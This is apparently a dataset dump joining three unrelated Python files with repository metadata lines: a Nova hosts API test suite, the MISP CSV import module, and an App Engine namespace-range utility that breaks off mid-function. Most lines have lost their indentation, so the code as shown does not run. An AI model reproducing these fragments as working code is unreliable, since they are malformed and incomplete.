inst['ephemeral_gb'] = kwargs.get('ephemeral_gb', 30)
inst['vm_state'] = kwargs.get('vm_state', vm_states.ACTIVE)
inst['power_state'] = kwargs.get('power_state', power_state.RUNNING)
inst['task_state'] = kwargs.get('task_state', None)
inst['availability_zone'] = kwargs.get('availability_zone', None)
inst['ami_launch_index'] = 0
inst['launched_on'] = kwargs.get('launched_on', 'dummy')
return inst
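# Sketch: tests persist one of these dicts via _create_instance above, e.g.
#   inst = _create_instance(project_id='p-01', host='host_c1', vcpus=2)
# which writes an ACTIVE/RUNNING instance row under the admin context.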
class FakeRequest(object):
environ = {"nova.context": context.get_admin_context()}
GET = {}
class FakeRequestWithNovaZone(object):
environ = {"nova.context": context.get_admin_context()}
GET = {"zone": "nova"}
class HostTestCase(test.TestCase):
"""Test Case for hosts."""
def setUp(self):
super(HostTestCase, self).setUp()
self.controller = os_hosts.HostController()
self.req = FakeRequest()
self.stubs.Set(db, 'service_get_all',
stub_service_get_all)
self.stubs.Set(self.controller.api, 'set_host_enabled',
stub_set_host_enabled)
self.stubs.Set(self.controller.api, 'set_host_maintenance',
stub_set_host_maintenance)
self.stubs.Set(self.controller.api, 'host_power_action',
stub_host_power_action)
def _test_host_update(self, host, key, val, expected_value):
body = {key: val}
result = self.controller.update(self.req, host, body)
self.assertEqual(result[key], expected_value)
def test_list_hosts(self):
"""Verify that the compute hosts are returned."""
hosts = os_hosts._list_hosts(self.req)
self.assertEqual(hosts, HOST_LIST['hosts'])
def test_list_hosts_with_zone(self):
req = FakeRequestWithNovaZone()
hosts = os_hosts._list_hosts(req)
self.assertEqual(hosts, HOST_LIST_NOVA_ZONE)
def test_disable_host(self):
self._test_host_update('host_c1', 'status', 'disable', 'disabled')
self._test_host_update('host_c2', 'status', 'disable', 'enabled')
def test_enable_host(self):
self._test_host_update('host_c1', 'status', 'enable', 'enabled')
self._test_host_update('host_c2', 'status', 'enable', 'disabled')
def test_enable_maintenance(self):
self._test_host_update('host_c1', 'maintenance_mode',
'enable', 'on_maintenance')
def test_disable_maintenance(self):
self._test_host_update('host_c1', 'maintenance_mode',
'disable', 'off_maintenance')
def _test_host_update_notimpl(self, key, val):
def stub_service_get_all_notimpl(self, req):
return [{'host': 'notimplemented', 'topic': None,
'availability_zone': None}]
self.stubs.Set(db, 'service_get_all',
stub_service_get_all_notimpl)
body = {key: val}
self.assertRaises(webob.exc.HTTPNotImplemented,
self.controller.update,
self.req, 'notimplemented', body=body)
def test_disable_host_notimpl(self):
self._test_host_update_notimpl('status', 'disable')
def test_enable_maintenance_notimpl(self):
self._test_host_update_notimpl('maintenance_mode', 'enable')
def test_host_startup(self):
result = self.controller.startup(self.req, "host_c1")
self.assertEqual(result["power_action"], "startup")
def test_host_shutdown(self):
result = self.controller.shutdown(self.req, "host_c1")
self.assertEqual(result["power_action"], "shutdown")
def test_host_reboot(self):
result = self.controller.reboot(self.req, "host_c1")
self.assertEqual(result["power_action"], "reboot")
def _test_host_power_action_notimpl(self, method):
self.assertRaises(webob.exc.HTTPNotImplemented,
method, self.req, "notimplemented")
def test_host_startup_notimpl(self):
self._test_host_power_action_notimpl(self.controller.startup)
def test_host_shutdown_notimpl(self):
self._test_host_power_action_notimpl(self.controller.shutdown)
def test_host_reboot_notimpl(self):
self._test_host_power_action_notimpl(self.controller.reboot)
def test_bad_status_value(self):
bad_body = {"status": "bad"}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
self.req, "host_c1", bad_body)
bad_body2 = {"status": "disablabc"}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
self.req, "host_c1", bad_body2)
def test_bad_update_key(self):
bad_body = {"crazy": "bad"}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
self.req, "host_c1", bad_body)
def test_bad_update_key_and_correct_update_key(self):
bad_body = {"status": "disable", "crazy": "bad"}
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.update,
self.req, "host_c1", bad_body)
def test_good_update_keys(self):
body = {"status": "disable", "maintenance_mode": "enable"}
result = self.controller.update(self.req, 'host_c1', body)
self.assertEqual(result["host"], "host_c1")
self.assertEqual(result["status"], "disabled")
self.assertEqual(result["maintenance_mode"], "on_maintenance")
def test_bad_host(self):
self.assertRaises(webob.exc.HTTPNotFound, self.controller.update,
self.req, "bogus_host_name", {"status": "disable"})
def test_show_forbidden(self):
self.req.environ["nova.context"].is_admin = False
dest = 'dummydest'
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.show,
self.req, dest)
self.req.environ["nova.context"].is_admin = True
def test_show_host_not_exist(self):
"""A host given as an argument does not exists."""
self.req.environ["nova.context"].is_admin = True
dest = 'dummydest'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show,
self.req, dest)
def _create_compute_service(self):
"""Create compute-manager(ComputeNode and Service record)."""
ctxt = context.get_admin_context()
dic = {'host': 'dummy', 'binary': 'nova-compute', 'topic': 'compute',
'report_count': 0}
s_ref = db.service_create(ctxt, dic)
dic = {'service_id': s_ref['id'],
'vcpus': 16, 'memory_mb': 32, 'local_gb': 100,
'vcpus_used': 16, 'memory_mb_used': 32, 'local_gb_used': 10,
'hypervisor_type': 'qemu', 'hypervisor_version': 12003,
'cpu_info': '', 'stats': {}}
db.compute_node_create(ctxt, dic)
return db.service_get(ctxt, s_ref['id'])
def test_show_no_project(self):
"""No instance are running on the given host."""
ctxt = context.get_admin_context()
s_ref = self._create_compute_service()
result = self.controller.show(self.req, s_ref['host'])
proj = ['(total)', '(used_now)', '(used_max)']
column = ['host', 'project', 'cpu', 'memory_mb', 'disk_gb']
self.assertEqual(len(result['host']), 3)
for resource in result['host']:
self.assertTrue(resource['resource']['project'] in proj)
self.assertEqual(len(resource['resource']), 5)
self.assertTrue(set(resource['resource'].keys()) == set(column))
db.service_destroy(ctxt, s_ref['id'])
def test_show_works_correctly(self):
"""show() works correctly as expected."""
ctxt = context.get_admin_context()
s_ref = self._create_compute_service()
i_ref1 = _create_instance(project_id='p-01', host=s_ref['host'])
i_ref2 = _create_instance(project_id='p-02', vcpus=3,
host=s_ref['host'])
result = self.controller.show(self.req, s_ref['host'])
proj = ['(total)', '(used_now)', '(used_max)', 'p-01', 'p-02']
column = ['host', 'project', 'cpu', 'memory_mb', 'disk_gb']
self.assertEqual(len(result['host']), 5)
for resource in result['host']:
            self.assertIn(resource['resource']['project'], proj)
            self.assertEqual(len(resource['resource']), 5)
            self.assertEqual(set(resource['resource'].keys()), set(column))
db.service_destroy(ctxt, s_ref['id'])
db.instance_destroy(ctxt, i_ref1['uuid'])
db.instance_destroy(ctxt, i_ref2['uuid'])
class HostSerializerTest(test.TestCase):
def setUp(self):
super(HostSerializerTest, self).setUp()
self.deserializer = os_hosts.HostUpdateDeserializer()
def test_index_serializer(self):
serializer = os_hosts.HostIndexTemplate()
text = serializer.serialize(HOST_LIST)
tree = etree.fromstring(text)
self.assertEqual('hosts', tree.tag)
self.assertEqual(len(HOST_LIST['hosts']), len(tree))
        for i in range(len(HOST_LIST['hosts'])):
self.assertEqual('host', tree[i].tag)
self.assertEqual(HOST_LIST['hosts'][i]['host_name'],
tree[i].get('host_name'))
self.assertEqual(HOST_LIST['hosts'][i]['service'],
tree[i].get('service'))
def test_update_serializer_with_status(self):
exemplar = dict(host='host_c1', status='enabled')
serializer = os_hosts.HostUpdateTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('host', tree.tag)
for key, value in exemplar.items():
self.assertEqual(value, tree.get(key))
    def test_update_serializer_with_maintenance_mode(self):
exemplar = dict(host='host_c1', maintenance_mode='enabled')
serializer = os_hosts.HostUpdateTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('host', tree.tag)
for key, value in exemplar.items():
self.assertEqual(value, tree.get(key))
    def test_update_serializer_with_maintenance_mode_and_status(self):
exemplar = dict(host='host_c1',
maintenance_mode='enabled',
status='enabled')
serializer = os_hosts.HostUpdateTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('host', tree.tag)
for key, value in exemplar.items():
self.assertEqual(value, tree.get(key))
def test_action_serializer(self):
exemplar = dict(host='host_c1', power_action='reboot')
serializer = os_hosts.HostActionTemplate()
text = serializer.serialize(exemplar)
tree = etree.fromstring(text)
self.assertEqual('host', tree.tag)
for key, value in exemplar.items():
self.assertEqual(value, tree.get(key))
def test_update_deserializer(self):
exemplar = dict(status='enabled', maintenance_mode='disable')
intext = """<?xml version='1.0' encoding='UTF-8'?>
<updates>
<status>enabled</status>
<maintenance_mode>disable</maintenance_mode>
</updates>"""
result = self.deserializer.deserialize(intext)
self.assertEqual(dict(body=exemplar), result)
|
apache-2.0
|
MISP/misp-modules
|
misp_modules/modules/import_mod/csvimport.py
|
1
|
15484
|
# -*- coding: utf-8 -*-
from pymisp import MISPEvent, MISPObject
from pymisp import __path__ as pymisp_path
import csv
import io
import json
import os
import base64
misperrors = {'error': 'Error'}
moduleinfo = {'version': '0.2', 'author': 'Christian Studer',
'description': 'Import Attributes from a csv file.',
'module-type': ['import']}
moduleconfig = []
userConfig = {
'header': {
'type': 'String',
        'message': 'Define the header of the csv file as a comma-separated list of types (MISP attribute types or attribute field names).\nFor fields that do not match these types, or that you want to skip, use a space or simply nothing between the commas.\nFor instance: ip-src,domain, ,timestamp'},
'has_header': {
'type': 'Boolean',
        'message': 'Tick this box ONLY if there is an uncommented header line and all of its fields follow the recommendations above.'},
'special_delimiter': {
'type': 'String',
        'message': 'If the delimiter is not a comma, please specify the one used (for instance: ";", "|", "/", "\t" for tabs, etc).'
}
}
mispattributes = {'userConfig': userConfig, 'inputSource': ['file'], 'format': 'misp_standard'}
misp_standard_csv_header = ['uuid', 'event_id', 'category', 'type', 'value', 'comment', 'to_ids', 'date',
'object_relation', 'attribute_tag', 'object_uuid', 'object_name', 'object_meta_category']
misp_context_additional_fields = ['event_info', 'event_member_org', 'event_source_org', 'event_distribution',
'event_threat_level_id', 'event_analysis', 'event_date', 'event_tag']
misp_extended_csv_header = misp_standard_csv_header + misp_context_additional_fields
class CsvParser():
def __init__(self, header, has_header, delimiter, data, from_misp, MISPtypes, categories):
self.misp_event = MISPEvent()
self.header = header
self.has_header = has_header
self.delimiter = delimiter
self.data = data
self.from_misp = from_misp
self.MISPtypes = MISPtypes
self.categories = categories
self.fields_number = len(self.header)
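        # Dispatch table keyed by the bitmask built in __get_score below:
        # +1 when the header carries 'to_ids', +2 for 'attribute_tag' and
        # +4 for 'category'; each entry builds an attribute dict handling
        # exactly those optional fields.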
self.__score_mapping = {0: self.__create_standard_attribute,
1: self.__create_attribute_with_ids,
2: self.__create_attribute_with_tags,
3: self.__create_attribute_with_ids_and_tags,
4: self.__create_attribute_check_category,
5: self.__create_attribute_check_category_and_ids,
6: self.__create_attribute_check_category_and_tags,
7: self.__create_attribute_check_category_with_ids_and_tags}
def parse_csv(self):
if self.from_misp:
if self.header == misp_standard_csv_header:
self.__parse_misp_csv()
else:
attribute_fields = misp_standard_csv_header[:1] + misp_standard_csv_header[2:10]
object_fields = ['object_id'] + misp_standard_csv_header[10:]
attribute_indexes = []
object_indexes = []
for i in range(len(self.header)):
if self.header[i] in attribute_fields:
attribute_indexes.append(i)
elif self.header[i] in object_fields:
object_indexes.append(i)
if object_indexes:
if not any(field in self.header for field in ('object_uuid', 'object_id')) or 'object_name' not in self.header:
for line in self.data:
for index in object_indexes:
if line[index].strip():
                                    return {'error': 'It is not possible to import MISP objects from your csv file without an object identifier and an object name to separate the objects from one another.'}
if 'object_relation' not in self.header:
return {'error': 'In order to import MISP objects, an object relation for each attribute contained in an object is required.'}
self.__build_misp_event(attribute_indexes, object_indexes)
else:
            attribute_fields = misp_standard_csv_header[:1] + misp_standard_csv_header[2:9]
attribute_indexes = []
types_indexes = []
for i in range(len(self.header)):
if self.header[i] in attribute_fields:
attribute_indexes.append(i)
elif self.header[i] in self.MISPtypes:
types_indexes.append(i)
self.__parse_external_csv(attribute_indexes, types_indexes)
self.__finalize_results()
return {'success': 1}
################################################################################
# Parsing csv data with MISP fields, #
# but a custom header #
################################################################################
def __build_misp_event(self, attribute_indexes, object_indexes):
score = self.__get_score()
if object_indexes:
objects = {}
id_name = 'object_id' if 'object_id' in self.header else 'object_uuid'
object_id_index = self.header.index(id_name)
name_index = self.header.index('object_name')
for line in self.data:
attribute = self.__score_mapping[score](line, attribute_indexes)
object_id = line[object_id_index]
if object_id:
if object_id not in objects:
misp_object = MISPObject(line[name_index])
if id_name == 'object_uuid':
misp_object.uuid = object_id
objects[object_id] = misp_object
objects[object_id].add_attribute(**attribute)
else:
                    self.misp_event.add_attribute(**attribute)
for misp_object in objects.values():
self.misp_event.add_object(**misp_object)
else:
for line in self.data:
attribute = self.__score_mapping[score](line, attribute_indexes)
self.misp_event.add_attribute(**attribute)
################################################################################
# Parsing csv data containing fields that are not #
# MISP attributes or objects standard fields #
# (but should be MISP attribute types!!) #
################################################################################
def __parse_external_csv(self, attribute_indexes, types_indexes):
score = self.__get_score()
if attribute_indexes:
for line in self.data:
try:
base_attribute = self.__score_mapping[score](line, attribute_indexes)
except IndexError:
continue
for index in types_indexes:
attribute = {'type': self.header[index], 'value': line[index]}
attribute.update(base_attribute)
self.misp_event.add_attribute(**attribute)
else:
for line in self.data:
for index in types_indexes:
self.misp_event.add_attribute(**{'type': self.header[index], 'value': line[index]})
################################################################################
# Parsing standard MISP csv format #
################################################################################
def __parse_misp_csv(self):
objects = {}
attribute_fields = self.header[:1] + self.header[2:8]
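        # Each line follows misp_standard_csv_header; the unpacking below
        # keeps the attribute-level fields and drops event_id and the object
        # meta-category, which are not needed to rebuild the event.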
for line in self.data:
a_uuid, _, category, _type, value, comment, ids, timestamp, relation, tag, o_uuid, name, _ = line[:self.fields_number]
attribute = {t: v.strip('"') for t, v in zip(attribute_fields, (a_uuid, category, _type, value, comment, ids, timestamp))}
            attribute['to_ids'] = attribute['to_ids'] == '1'
if tag:
attribute['Tag'] = [{'name': t.strip()} for t in tag.split(',')]
if relation:
if o_uuid not in objects:
objects[o_uuid] = MISPObject(name)
objects[o_uuid].add_attribute(relation, **attribute)
else:
self.misp_event.add_attribute(**attribute)
for uuid, misp_object in objects.items():
misp_object.uuid = uuid
self.misp_event.add_object(**misp_object)
################################################################################
# Utility functions #
################################################################################
def __create_attribute_check_category(self, line, indexes):
attribute = self.__create_standard_attribute(line, indexes)
self.__check_category(attribute)
return attribute
def __create_attribute_check_category_and_ids(self, line, indexes):
attribute = self.__create_attribute_with_ids(line, indexes)
self.__check_category(attribute)
return attribute
def __create_attribute_check_category_and_tags(self, line, indexes):
attribute = self.__create_attribute_with_tags(line, indexes)
self.__check_category(attribute)
return attribute
def __create_attribute_check_category_with_ids_and_tags(self, line, indexes):
attribute = self.__create_attribute_with_ids_and_tags(line, indexes)
self.__check_category(attribute)
return attribute
def __create_attribute_with_ids(self, line, indexes):
attribute = self.__create_standard_attribute(line, indexes)
self.__deal_with_ids(attribute)
return attribute
def __create_attribute_with_ids_and_tags(self, line, indexes):
attribute = self.__create_standard_attribute(line, indexes)
self.__deal_with_ids(attribute)
self.__deal_with_tags(attribute)
return attribute
def __create_attribute_with_tags(self, line, indexes):
attribute = self.__create_standard_attribute(line, indexes)
self.__deal_with_tags(attribute)
return attribute
def __create_standard_attribute(self, line, indexes):
return {self.header[index]: line[index] for index in indexes if line[index]}
def __check_category(self, attribute):
category = attribute['category']
if category in self.categories:
return
if category.capitalize() in self.categories:
attribute['category'] = category.capitalize()
return
del attribute['category']
@staticmethod
def __deal_with_ids(attribute):
        attribute['to_ids'] = attribute['to_ids'] == '1'
@staticmethod
def __deal_with_tags(attribute):
attribute['Tag'] = [{'name': tag.strip()} for tag in attribute['Tag'].split(',')]
def __get_score(self):
score = 1 if 'to_ids' in self.header else 0
if 'attribute_tag' in self.header:
score += 2
if 'category' in self.header:
score += 4
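        # Illustrative example (not part of the original module): a header
        # containing 'to_ids' and 'category' but no 'attribute_tag' scores
        # 1 + 4 = 5, dispatching to __create_attribute_check_category_and_ids.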
return score
def __finalize_results(self):
event = json.loads(self.misp_event.to_json())
self.results = {key: event[key] for key in ('Attribute', 'Object') if (key in event and event[key])}
def __any_mandatory_misp_field(header):
return any(field in header for field in ('type', 'value'))
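# Both parsers below run the raw text through csv.reader, strip every field
# and drop empty or commented ('#') lines; the 'special' variant additionally
# re-splits the first field of each row on the user-supplied delimiter, since
# csv.reader was fed with the default comma.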
def __special_parsing(data, delimiter):
return list(tuple(part.strip() for part in line[0].split(delimiter)) for line in csv.reader(io.TextIOWrapper(io.BytesIO(data.encode()), encoding='utf-8')) if line and not line[0].startswith('#'))
def __standard_parsing(data):
return list(tuple(part.strip() for part in line) for line in csv.reader(io.TextIOWrapper(io.BytesIO(data.encode()), encoding='utf-8')) if line and not line[0].startswith('#'))
def handler(q=False):
if q is False:
return False
request = json.loads(q)
if request.get('data'):
try:
data = base64.b64decode(request['data']).decode('utf-8')
except UnicodeDecodeError:
misperrors['error'] = "Input is not valid UTF-8"
return misperrors
else:
misperrors['error'] = "Unsupported attributes type"
return misperrors
has_header = request['config'].get('has_header')
    has_header = has_header == '1'
    header = request['config']['header'].split(',') if request['config'].get('header', '').strip() else []
    delimiter = request['config']['special_delimiter'] if request['config'].get('special_delimiter', '').strip() else ','
data = __standard_parsing(data) if delimiter == ',' else __special_parsing(data, delimiter)
if not header:
if has_header:
header = data.pop(0)
else:
misperrors['error'] = "Configuration error. Provide a header or use the one within the csv file and tick the checkbox 'Has_header'."
return misperrors
else:
header = [h.strip() for h in header]
if has_header:
del data[0]
if header == misp_standard_csv_header or header == misp_extended_csv_header:
header = misp_standard_csv_header
descFilename = os.path.join(pymisp_path[0], 'data/describeTypes.json')
with open(descFilename, 'r') as f:
description = json.loads(f.read())['result']
MISPtypes = description['types']
for h in header:
if not any((h in MISPtypes, h in misp_extended_csv_header, h in ('', ' ', '_', 'object_id'))):
misperrors['error'] = 'Wrong header field: {}. Please use a header value that can be recognized by MISP (or alternatively skip it using a whitespace).'.format(h)
return misperrors
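    # The input is treated as a MISP export when every header field is a
    # standard or extended MISP csv column (or an explicit placeholder);
    # otherwise the remaining fields must be plain MISP attribute types.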
from_misp = all((h in misp_extended_csv_header or h in ('', ' ', '_', 'object_id') for h in header))
if from_misp:
if not __any_mandatory_misp_field(header):
            misperrors['error'] = 'Please make sure the data you try to import can be identified with a type/value combination.'
return misperrors
else:
if __any_mandatory_misp_field(header):
wrong_types = tuple(wrong_type for wrong_type in ('type', 'value') if wrong_type in header)
            misperrors['error'] = 'Error with the following header: {}. It contains the following field(s): {}, which is(are) already provided by the use of at least one MISP attribute type in the header.'.format(header, ' and '.join(wrong_types))
return misperrors
csv_parser = CsvParser(header, has_header, delimiter, data, from_misp, MISPtypes, description['categories'])
# build the attributes
result = csv_parser.parse_csv()
if 'error' in result:
return result
return {'results': csv_parser.results}
def introspection():
return mispattributes
def version():
moduleinfo['config'] = moduleconfig
return moduleinfo
|
agpl-3.0
|
datasciencedev/locality-sensitive-hashing
|
mapreduce/namespace_range.py
|
37
|
15075
|
#!/usr/bin/env python
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Represents a lexographic range of namespaces."""
# pylint: disable=g-bad-name
__all__ = [
'NAMESPACE_CHARACTERS',
'MAX_NAMESPACE_LENGTH',
'MAX_NAMESPACE',
'MIN_NAMESPACE',
'NAMESPACE_BATCH_SIZE',
'NamespaceRange',
'get_namespace_keys',
]
import itertools
import string
from google.appengine.api import datastore
from google.appengine.ext import db
from google.appengine.ext.db import metadata
NAMESPACE_CHARACTERS = ''.join(sorted(string.digits +
string.lowercase +
string.uppercase +
'._-'))
MAX_NAMESPACE_LENGTH = 100
MIN_NAMESPACE = ''
NAMESPACE_BATCH_SIZE = 50
def _setup_constants(alphabet=NAMESPACE_CHARACTERS,
max_length=MAX_NAMESPACE_LENGTH,
batch_size=NAMESPACE_BATCH_SIZE):
"""Calculate derived constant values. Only useful for testing."""
global NAMESPACE_CHARACTERS
global MAX_NAMESPACE_LENGTH
# pylint: disable=global-variable-undefined
global MAX_NAMESPACE
global _LEX_DISTANCE
global NAMESPACE_BATCH_SIZE
NAMESPACE_CHARACTERS = alphabet
MAX_NAMESPACE_LENGTH = max_length
MAX_NAMESPACE = NAMESPACE_CHARACTERS[-1] * MAX_NAMESPACE_LENGTH
NAMESPACE_BATCH_SIZE = batch_size
# _LEX_DISTANCE will contain the lexical distance between two adjacent
# characters in NAMESPACE_CHARACTERS at each character index. This is used
# to calculate the ordinal for each string. Example:
# NAMESPACE_CHARACTERS = 'ab'
# MAX_NAMESPACE_LENGTH = 3
# _LEX_DISTANCE = [1, 3, 7]
# '' => 0
# 'a' => 1
# 'aa' => 2
# 'aaa' => 3
# 'aab' => 4 - Distance between 'aaa' and 'aab' is 1.
# 'ab' => 5 - Distance between 'aa' and 'ab' is 3.
# 'aba' => 6
# 'abb' => 7
# 'b' => 8 - Distance between 'a' and 'b' is 7.
# 'ba' => 9
# 'baa' => 10
# 'bab' => 11
# ...
# _namespace_to_ord('bab') = (1 * 7 + 1) + (0 * 3 + 1) + (1 * 1 + 1) = 11
_LEX_DISTANCE = [1]
for i in range(1, MAX_NAMESPACE_LENGTH):
_LEX_DISTANCE.append(
_LEX_DISTANCE[i-1] * len(NAMESPACE_CHARACTERS) + 1)
# pylint: disable=undefined-loop-variable
del i
_setup_constants()
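# Illustrative sanity check (not part of the original module): the two helpers
# below are inverses of each other over the configured alphabet, e.g.
#   _ord_to_namespace(_namespace_to_ord('abc')) == 'abc'
#   _namespace_to_ord(_ord_to_namespace(42)) == 42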
def _ord_to_namespace(n, _max_length=None):
"""Convert a namespace ordinal to a namespace string.
Converts an int, representing the sequence number of a namespace ordered
  lexicographically, into a namespace string.
>>> _ord_to_namespace(0)
''
>>> _ord_to_namespace(1)
'-'
>>> _ord_to_namespace(2)
'--'
>>> _ord_to_namespace(3)
'---'
Args:
    n: A number representing the lexicographical ordering of a namespace.
_max_length: The maximum namespace length.
Returns:
    A string representing the nth namespace in lexicographical order.
"""
if _max_length is None:
_max_length = MAX_NAMESPACE_LENGTH
length = _LEX_DISTANCE[_max_length - 1]
if n == 0:
return ''
n -= 1
  return (NAMESPACE_CHARACTERS[n // length] +
_ord_to_namespace(n % length, _max_length - 1))
def _namespace_to_ord(namespace):
"""Converts a namespace string into an int representing its lexographic order.
>>> _namespace_to_ord('')
''
>>> _namespace_to_ord('_')
1
>>> _namespace_to_ord('__')
2
Args:
namespace: A namespace string.
Returns:
    An int representing the lexicographical order of the given namespace string.
"""
n = 0
for i, c in enumerate(namespace):
    n += (_LEX_DISTANCE[MAX_NAMESPACE_LENGTH - i - 1] *
NAMESPACE_CHARACTERS.index(c)
+ 1)
return n
def _key_for_namespace(namespace, app):
"""Return the __namespace__ key for a namespace.
Args:
namespace: The namespace whose key is requested.
app: The id of the application that the key belongs to.
Returns:
A db.Key representing the namespace.
"""
if namespace:
return db.Key.from_path(metadata.Namespace.KIND_NAME,
namespace,
_app=app)
else:
return db.Key.from_path(metadata.Namespace.KIND_NAME,
metadata.Namespace.EMPTY_NAMESPACE_ID,
_app=app)
class NamespaceRange(object):
"""An inclusive lexographical range of namespaces.
This class is immutable.
"""
def __init__(self,
namespace_start=None,
namespace_end=None,
_app=None):
# pylint: disable=g-doc-args
"""Initializes a NamespaceRange instance.
Args:
namespace_start: A string representing the start of the namespace range.
namespace_start is included in the range. If namespace_start is None
          then the lexicographically first namespace is used.
namespace_end: A string representing the end of the namespace range.
namespace_end is included in the range and must be >= namespace_start.
          If namespace_end is None then the lexicographically last namespace is
used.
Raises:
ValueError: if namespace_start > namespace_end.
"""
if namespace_start is None:
namespace_start = MIN_NAMESPACE
if namespace_end is None:
namespace_end = MAX_NAMESPACE
if namespace_start > namespace_end:
raise ValueError('namespace_start (%r) > namespace_end (%r)' % (
namespace_start, namespace_end))
self.__namespace_start = namespace_start
self.__namespace_end = namespace_end
self.__app = _app
@property
def app(self):
return self.__app
@property
def namespace_start(self):
return self.__namespace_start
@property
def namespace_end(self):
return self.__namespace_end
@property
def is_single_namespace(self):
"""True if the namespace range only includes a single namespace."""
return self.namespace_start == self.namespace_end
def split_range(self):
"""Splits the NamespaceRange into two nearly equal-sized ranges.
Returns:
If this NamespaceRange contains a single namespace then a list containing
this NamespaceRange is returned. Otherwise a two-element list containing
two NamespaceRanges whose total range is identical to this
NamespaceRange's is returned.
"""
if self.is_single_namespace:
return [self]
mid_point = (_namespace_to_ord(self.namespace_start) +
_namespace_to_ord(self.namespace_end)) // 2
return [NamespaceRange(self.namespace_start,
_ord_to_namespace(mid_point),
_app=self.app),
NamespaceRange(_ord_to_namespace(mid_point+1),
self.namespace_end,
_app=self.app)]
def __copy__(self):
return self.__class__(self.__namespace_start,
self.__namespace_end,
self.__app)
def __eq__(self, o):
return (self.namespace_start == o.namespace_start and
self.namespace_end == o.namespace_end)
def __hash__(self):
return hash((self.namespace_start, self.namespace_end, self.app))
def __repr__(self):
if self.app is None:
return 'NamespaceRange(namespace_start=%r, namespace_end=%r)' % (
self.namespace_start, self.namespace_end)
else:
return 'NamespaceRange(namespace_start=%r, namespace_end=%r, _app=%r)' % (
self.namespace_start, self.namespace_end, self.app)
def with_start_after(self, after_namespace):
"""Returns a copy of this NamespaceName with a new namespace_start.
Args:
after_namespace: A namespace string.
Returns:
      A NamespaceRange object whose namespace_start is the lexicographically next
namespace after the given namespace string.
Raises:
ValueError: if the NamespaceRange includes only a single namespace.
"""
namespace_start = _ord_to_namespace(_namespace_to_ord(after_namespace) + 1)
return NamespaceRange(namespace_start, self.namespace_end, _app=self.app)
def make_datastore_query(self, cursor=None):
"""Returns a datastore.Query that generates all namespaces in the range.
Args:
cursor: start cursor for the query.
Returns:
A datastore.Query instance that generates db.Keys for each namespace in
the NamespaceRange.
"""
filters = {}
filters['__key__ >= '] = _key_for_namespace(
self.namespace_start, self.app)
filters['__key__ <= '] = _key_for_namespace(
self.namespace_end, self.app)
return datastore.Query('__namespace__',
filters=filters,
keys_only=True,
cursor=cursor,
_app=self.app)
def normalized_start(self):
"""Returns a NamespaceRange with leading non-existant namespaces removed.
Returns:
A copy of this NamespaceRange whose namespace_start is adjusted to exclude
the portion of the range that contains no actual namespaces in the
datastore. None is returned if the NamespaceRange contains no actual
namespaces in the datastore.
"""
namespaces_after_key = list(self.make_datastore_query().Run(limit=1))
if not namespaces_after_key:
return None
namespace_after_key = namespaces_after_key[0].name() or ''
return NamespaceRange(namespace_after_key,
self.namespace_end,
_app=self.app)
def to_json_object(self):
"""Returns a dict representation that can be serialized to JSON."""
obj_dict = dict(namespace_start=self.namespace_start,
namespace_end=self.namespace_end)
if self.app is not None:
obj_dict['app'] = self.app
return obj_dict
@classmethod
def from_json_object(cls, json):
"""Returns a NamespaceRange from an object deserialized from JSON."""
return cls(json['namespace_start'],
json['namespace_end'],
_app=json.get('app'))
# TODO(user): Implement an option where the returned namespace range is
# not normalized using with_start_after to support consistent namespace
# queries.
@classmethod
def split(cls,
n,
contiguous,
can_query=itertools.chain(itertools.repeat(True, 50),
itertools.repeat(False)).next,
_app=None):
# pylint: disable=g-doc-args
"""Splits the complete NamespaceRange into n equally-sized NamespaceRanges.
Args:
      n: The maximum number of NamespaceRanges to return. Fewer than n
          NamespaceRanges may be returned.
contiguous: If True then the returned NamespaceRanges will cover the
entire space of possible namespaces (i.e. from MIN_NAMESPACE to
MAX_NAMESPACE) without gaps. If False then the returned
NamespaceRanges may exclude namespaces that don't appear in the
datastore.
      can_query: A function that returns True if split() can query the datastore
          to generate fairer namespace range splits, and False otherwise.
          If not set then split() is allowed to make 50 datastore queries.
Returns:
A list of at most n NamespaceRanges representing a near-equal distribution
      of actual existent datastore namespaces. The returned list will be sorted
      lexicographically.
Raises:
ValueError: if n is < 1.
"""
if n < 1:
raise ValueError('n must be >= 1')
ranges = None
if can_query():
if not contiguous:
ns_keys = get_namespace_keys(_app, n + 1)
if not ns_keys:
return []
else:
if len(ns_keys) <= n:
# If you have less actual namespaces than number of NamespaceRanges
# to return, then just return the list of those namespaces.
ns_range = []
for ns_key in ns_keys:
ns_range.append(NamespaceRange(ns_key.name() or '',
ns_key.name() or '',
_app=_app))
return sorted(ns_range,
key=lambda ns_range: ns_range.namespace_start)
# Use the first key and save the initial normalized_start() call.
ranges = [NamespaceRange(ns_keys[0].name() or '', _app=_app)]
else:
ns_range = NamespaceRange(_app=_app).normalized_start()
if ns_range is None:
return [NamespaceRange(_app=_app)]
ranges = [ns_range]
else:
ranges = [NamespaceRange(_app=_app)]
singles = []
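    # Breadth-first bisection: pop a range, set aside single-namespace ranges
    # (they cannot be split further), otherwise split the range and keep both
    # halves until n ranges have been accumulated.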
while ranges and (len(ranges) + len(singles)) < n:
namespace_range = ranges.pop(0)
if namespace_range.is_single_namespace:
singles.append(namespace_range)
else:
left, right = namespace_range.split_range()
if can_query():
right = right.normalized_start()
if right is not None:
ranges.append(right)
ranges.append(left)
ns_ranges = sorted(singles + ranges,
key=lambda ns_range: ns_range.namespace_start)
if contiguous:
if not ns_ranges:
# This condition is possible if every namespace was deleted after the
# first call to ns_range.normalized_start().
return [NamespaceRange(_app=_app)]
continuous_ns_ranges = []
for i in range(len(ns_ranges)):
if i == 0:
namespace_start = MIN_NAMESPACE
else:
namespace_start = ns_ranges[i].namespace_start
